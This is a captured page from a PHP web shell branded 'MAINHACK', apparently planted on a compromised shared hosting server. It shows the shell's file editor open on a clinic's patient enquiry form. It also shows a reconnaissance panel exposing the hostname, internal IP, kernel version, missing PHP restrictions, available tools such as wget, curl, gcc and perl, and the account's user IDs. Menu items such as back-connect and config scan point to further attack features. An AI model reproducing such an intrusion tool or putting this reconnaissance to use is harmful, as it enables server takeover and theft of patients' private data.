[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: enquiry - ADD- MORE.php
<?php include("header.php"); ?> <script src="js/jquery-1.11.1.min.js"></script> <!-- Addmore java --> <script type="text/javascript"> $(document).ready(function(){ // Add more $('#addmore').click(function(){ // Get last id var lastname_id = $('.tr_input input[type=file]:nth-child(1)').last().attr('id'); var split_id = lastname_id.split('_'); // New index var index = Number(split_id[1]) + 1; // Create row with input elements var html = "<div class='tr_input'><input type='file' class='username' id='testcode_"+index+"' name='price[]' style=''><div class='col-lg-1 col-md-1 col-sm-1 col-xs-1' style=''><a href='javascript:void(0);' id='remove_field' class='remCF btn btn-info' >-</a></div></div>"; // Append data $('#tab').append(html); }); $("#tab").on('click','.remCF',function(){ $(this).parent().parent().remove(); }); }); $(document).ready(function(){ // Add more $('#addmore').click(function(){ }); }); </script> <!-- // Addmore java --> <!-- enquiry.php Start --> <div class="enquiry"> <div class="spec aos-init aos-animate" data-aos="fade-down" style="transition:all 1500ms ease-in-out"> <h2>Enquiry Form</h2> </div> <!-- //tittle heading --> <div class="container"> <div class="col-md-3"></div> <div class="col-md-6 contact-left"> <form action="#" method="post"> <div class="form-left"> <label style="color: #FFF;font-weight: bold;">Patient Name:</label> <input type="text" placeholder="Patient Name" name="na" required=""> </div> <div class="form-right"> <label style="color: #FFF;font-weight: bold;">Patient Phone no :</label> <input type="text" placeholder="Patient Phone No" name="phn" required=""> </div> <div class="form-rightt"> <label style="color: #FFF;font-weight: bold;">Sex :</label> <input type="radio" name="gender" value="male" checked> Male <input type="radio" name="gender" value="female"> Female <input type="radio" name="gender" value="other"> Other </div> <div class="form-left"> <label style="color: #FFF;font-weight: bold;">Patient Date of Birth :</label> <input type="text" id="datepicker5" name="dob" placeholder="Enter Date of Birth" /> </div> <div class="form-right"> <label style="color: #FFF;font-weight: bold;">Patient file Upload:</label> <div class='tr_input' id="tab"> <input type='file' class='username' id='testcode_1' name="price[]" style=""> <input type='button' class="btn btn-info" value='+' id='addmore' > </div> </div> <div class="form-left"> <label style="color: #FFF;font-weight: bold;">Doctor Name :</label> <input type="text" name="pro_name" value="Doctor :( PRODUCT100 )" placeholder="Enter doctor Name" readonly=""> </div> <label style="color: #FFF;font-weight: bold;">Description :</label> <textarea name="msg" placeholder="Enter Your Message" required=""></textarea> <input type="submit" value="Submit"> </form> </div> <div class="col-md-3"></div> </div> </div> <!-- // enquiry.php Start --> <?php include("footer.php"); ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 678.13 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: 1619